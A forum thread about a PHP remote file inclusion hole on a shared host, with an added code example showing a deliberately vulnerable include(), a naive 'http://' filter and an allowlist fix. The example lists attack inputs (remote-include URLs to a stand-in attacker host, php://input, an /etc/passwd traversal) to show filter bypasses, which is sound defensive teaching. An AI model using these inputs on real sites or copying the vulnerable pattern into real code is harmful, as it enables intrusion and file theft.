  1. #1

    fopen and urls in PHP - Security Issue

    I provide a shared hosting environment and have had a client write an insecure script using the "include" statement. The server got hacked (more details below) and I eventually changed the "allow_url_fopen" php.ini setting to "Off" to disable the source of the attacks.

    My question is: Does anyone know how I can leave allow_url_fopen set to "On" and still protect against poor programming?

    More specifics on hack...
    The user was including local files in his url (had to use hddp to post this)
    hddp:// and the vandal simply typed in
    hddp:// ...
    Without filtering the incoming variable $inc, the vandal successfully installed a root kit and ... well you know the rest.

  2. #2
    Join Date: Feb 2005
    I don't think there is a way to prevent that exploit, but it's really easy to prevent with the preg_match function. Just have it parse the incoming GET variable to see if it has http:// in it. Tell all your customers to do something like this or their account will be suspended.
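
    The pattern described in post #1 and the http:// filter proposed in post #2, as an added example (not code from the thread or from any poster). The function names, the $inc parameter, the page keys and the pages/ directory are assumed for illustration. It shows the vulnerable include, why matching on "http://" alone is not enough (other stream wrappers and plain path traversal never contain that string), and an allowlist approach in which nothing from the request reaches include() verbatim. Two practitioner notes: since PHP 5.2 there is a separate allow_url_include directive, Off by default, that blocks include/require of URL wrappers while allow_url_fopen stays available to fopen() and file_get_contents(); and a mod_security rule, like the preg_match check, is signature matching, so it is a stopgap in front of code you do not control rather than a fix for the code itself.

```php
<?php
// Added example, not code from the thread. Illustrates remote/local file
// inclusion through include($inc) and an allowlist-based fix.
// $inc, the page keys and the 'pages/' directory are assumed names.

declare(strict_types=1);

// --- Vulnerable: the request value is the include target. ---
// With URL wrappers enabled for include, ?inc=http://attacker.example/x.txt
// fetches and executes remote code; ?inc=../../etc/passwd reads a local file
// regardless of the allow_url_* settings.
function include_page_vulnerable(string $inc): void
{
    include $inc; // DO NOT USE
}

// --- Post #2's idea: reject anything containing "http://". ---
function naive_filter_rejects(string $inc): bool
{
    return preg_match('#http://#', $inc) === 1;
}

// --- Hardened: a fixed table maps a short key to a file under one directory,
// and realpath() confirms the resolved file really lives under that directory.
function resolve_page(string $inc, string $baseDir): ?string
{
    $pages = [ // allowlist of pages the application actually ships (assumed)
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    ];
    if (!isset($pages[$inc])) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $pages[$inc]);
    // realpath() returns false for missing files and collapses '..'; require the
    // result to stay under $base so a misconfigured table cannot escape it.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function include_page_safe(string $inc, string $baseDir): void
{
    $path = resolve_page($inc, $baseDir);
    if ($path === null) {
        http_response_code(404);
        echo "Unknown page\n";
        return;
    }
    include $path;
}

// Constructed attack inputs; no network access is performed, they are only
// passed through the two checks. Only 'home' is accepted by the allowlist, and
// only if pages/home.php exists next to this script (assumed).
$inputs = [
    'http://attacker.example/shell.txt',   // the one case the naive filter catches
    'https://attacker.example/shell.txt',  // different wrapper, filter misses it
    'ftp://attacker.example/shell.txt',    // different wrapper, filter misses it
    'php://input',                         // would execute the POST body, filter misses it
    '../../../../etc/passwd',              // local file inclusion, filter misses it
    'home',                                // legitimate page key
];
foreach ($inputs as $inc) {
    printf("%-36s naive filter blocks: %-3s  allowlist accepts: %s\n",
        $inc,
        naive_filter_rejects($inc) ? 'yes' : 'no',
        resolve_page($inc, __DIR__ . '/pages') === null ? 'no' : 'yes');
}
```

    The point of the allowlist is that the request only selects among values the developer wrote; the filter approach has to enumerate every wrapper and traversal trick the attacker might use, and misses the next one.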

  3. #3
    Join Date: Mar 2003
    California USA
    You could try some good mod_security rules.
    Steven Ciaburri | Proactive Linux Server Management -
    Managed Servers (AS62710), Server Management, and Security Auditing.

  4. #4


    Thanks for your suggestions... After a little research, I think mod_security is the answer. Thanks again.
